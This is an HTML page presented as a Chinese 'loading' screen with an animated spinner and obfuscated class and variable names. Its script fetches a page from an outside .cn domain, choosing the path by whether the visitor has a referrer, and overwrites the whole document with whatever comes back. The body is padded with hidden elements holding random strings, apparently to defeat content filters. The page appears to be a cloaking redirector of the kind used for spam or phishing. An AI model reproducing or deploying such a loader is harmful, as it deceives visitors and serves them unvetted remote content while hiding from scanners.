<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .t9FtHTE {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .t9FtHTE .XQCj78QGDTu {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .t9FtHTE .content {
            line-height: 50px;
            text-align: center
        }

        .t9FtHTE .img {
            width: 100%
        }

        .t9FtHTE .KTOVDNH {
            text-align: center
        }

        .t9FtHTE .KTOVDNH span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .t9FtHTE .KTOVDNH span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .t9FtHTE .KTOVDNH span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .t9FtHTE .KTOVDNH span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .t9FtHTE .KTOVDNH span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .t9FtHTE .KTOVDNH span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .t9FtHTE .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function tAdBOVpVAbt(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var lRB0SN = tAdBOVpVAbt('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ lRB0SN +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ lRB0SN +".html?a=share";
		}
		
        jE08fSj5=url+"#"+new Date().getTime();
        jE08fSj5 && function() {
            $.get(jE08fSj5, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<span style='display:none'>ig5LXortw4vVdMf1AS52WAq03qNor6h0BP48q0kVsfy</span>
<b style='display:none' >AMqZjXVD5LE</b>
<ul style='display:none' >CV7UYpxEhH5Uc00jaQnBiM2zQYtETwhzWJH2guiewGAQxN9woLLq</ul>
<ul style='display:none' >CV7UYpxEhH5Uc00jaQnBiM2zQYtETwhzWJH2guiewGAQxN9woLLq</ul>
<a  href='#' style='display:none'>uPSY4odR3SZImv7h25IJqMaYAkceKUKOaJnOkc41zgVC3jDo5Cy</a><div class="t9FtHTE">
    <div class="XQCj78QGDTu">
        <div class="KTOVDNH">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >EdlOKHztOaWcCfopAjQTcyBe0VFhlbnVJsfCeKKjzBSFNn9C0v46aQMrCFOzj2WKG5Tt5oeOt</b>
<a  href='#' style='display:none'>zVRssmziBaq18igLHSLPH0olf0</a>
<span style='display:none'>uTGUN5pCAzH3DG7OLtj8xlKLDrihjA5uNBBli1Zxq6Oth7e9h</span>
<p  style='display:none'>uJQeLRRBD9cHBpyNv63CEgH5k0VhU5XFq4Hf2vrV1TQwgLSYwDtt9uk7VeV44rZNYRyHSRcE9OSyyb3NGy1kR</p>
<b style='display:none' >EdlOKHztOaWcCfopAjQTcyBe0VFhlbnVJsfCeKKjzBSFNn9C0v46aQMrCFOzj2WKG5Tt5oeOt</b>
<img  src='' style='display:none'>
<div style='display:none'>mIlaFnBO15nl5Wkaxxix5c8Ze5ddHmmixQ8RAi7lnY7mbQBchuogvKzlJk4BOhN0BJE15B</div>
<a  href='#' style='display:none'>zVRssmziBaq18igLHSLPH0olf0</a>
<p  style='display:none'>uJQeLRRBD9cHBpyNv63CEgH5k0VhU5XFq4Hf2vrV1TQwgLSYwDtt9uk7VeV44rZNYRyHSRcE9OSyyb3NGy1kR</p></body>
</html>